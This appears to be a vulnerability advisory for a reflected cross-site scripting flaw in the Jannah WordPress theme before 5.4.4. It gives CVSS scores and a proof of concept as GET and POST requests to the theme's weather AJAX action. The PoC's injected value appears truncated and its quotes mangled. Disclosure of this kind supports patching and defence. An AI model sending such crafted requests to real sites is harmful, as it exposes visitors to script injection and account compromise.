Truoc PhanWPVDB-ID:1D53FBE5-A879-42CA-A9D3-768A80018382Jannah < 5.4.4 - Reflected Cross-Site Scripting (XSS)
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
PoC
via GET: https://jannah.tielabs.com/demo/wp-admin/admin-ajax.php?action=tie_get_user_weather&options;={‘location’%3A’Cairo’%2C’units’%3A’C’%2C’forecast_days’%3A’5\">‘%2C’custom_name’%3A’Cairo’%2C’animated’%3A’true’} via POST: POST /demo/wp-admin/admin-ajax.php HTTP/1.1 Host: jannah.tielabs.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 195 Connection: close action=tie_get_user_weather&options;=%7B’location’%3A’Cairo’%2C’units’%3A’C’%2C’forecast_days’%3A’5">‘%2C’custom_name’%3A’Cairo’%2C’animated’%3A’true’%7D
Related
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N